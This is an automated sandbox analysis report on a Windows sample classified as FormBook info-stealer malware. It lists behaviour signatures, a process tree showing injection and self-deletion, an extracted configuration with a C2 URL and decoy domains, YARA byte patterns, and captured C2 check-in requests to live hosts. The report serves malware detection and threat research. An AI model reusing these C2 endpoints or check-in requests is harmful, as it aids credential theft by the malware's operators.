Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report z7d1ehQQQW.exe

Overview

General Information

Sample Name:z7d1ehQQQW.exe
Analysis ID:491384
MD5:50568fb6133ee4ed721ee46a3c0a9e98
SHA1:4897b6f2141395071652f72d34dc3d39eb014a56
SHA256:2b1a98add215568bb5e1c333321cf0ffe98d9128fa149c4f5a07ce2922750b3e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • z7d1ehQQQW.exe (PID: 984 cmdline: 'C:\Users\user\Desktop\z7d1ehQQQW.exe' MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
    • z7d1ehQQQW.exe (PID: 5800 cmdline: C:\Users\user\Desktop\z7d1ehQQQW.exe MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x2675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x28ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x931a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x53f9:$sqlite3step: 68 34 1C 7B E1
    • 0x550c:$sqlite3step: 68 34 1C 7B E1
    • 0x5428:$sqlite3text: 68 38 2A 90 C5
    • 0x554d:$sqlite3text: 68 38 2A 90 C5
    • 0x543b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x5563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.z7d1ehQQQW.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.z7d1ehQQQW.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.z7d1ehQQQW.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        0.2.z7d1ehQQQW.exe.2d13274.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          5.2.z7d1ehQQQW.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 2 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: z7d1ehQQQW.exeVirustotal: Detection: 24%Perma Link
            Source: z7d1ehQQQW.exeReversingLabs: Detection: 13%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47Avira URL Cloud: Label: malware
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: z7d1ehQQQW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: z7d1ehQQQW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 4x nop then pop ebx
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.dorotajedrusik.com
            Source: C:\Windows\explorer.exeDomain query: www.noseainsight.com
            Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.odysseysailingsantorini.com/cmsr/
            Source: global trafficHTTP traffic detected: GET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1Host: www.noseainsight.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1Host: www.dorotajedrusik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: z7d1ehQQQW.exe, 00000000.00000003.656320601.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comCe
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-uL
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comt
            Source: z7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comw.c
            Source: z7d1ehQQQW.exe, 00000000.00000003.659128745.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.co
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.664218437.0000000005B00000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658968542.0000000005AFF000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.657880283.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/O
            Source: z7d1ehQQQW.exe, 00000000.00000003.659434113.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: z7d1ehQQQW.exe, 00000000.00000003.658881250.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlO
            Source: z7d1ehQQQW.exe, 00000000.00000003.660117823.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers2I
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersMF5
            Source: z7d1ehQQQW.exe, 00000000.00000003.659553696.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersW
            Source: z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
            Source: z7d1ehQQQW.exe, 00000000.00000003.657817317.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerses-es_tradnl;
            Source: z7d1ehQQQW.exe, 00000000.00000003.660082867.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersn
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn;
            Source: z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnp
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.661245659.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-czt
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/1
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
            Source: z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/i
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/f
            Source: z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-1
            Source: z7d1ehQQQW.exe, 00000000.00000003.657056723.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656667821.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: z7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com0K
            Source: z7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: z7d1ehQQQW.exe, 00000000.00000003.660250458.0000000005B00000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: z7d1ehQQQW.exe, 00000000.00000003.657537776.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deF
            Source: z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deold
            Source: z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: cscript.exe, 00000009.00000002.918829235.00000000052AF000.00000004.00020000.sdmpString found in binary or memory: https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd
            Source: unknownDNS traffic detected: queries for: www.noseainsight.com
            Source: global trafficHTTP traffic detected: GET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1Host: www.noseainsight.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1Host: www.dorotajedrusik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
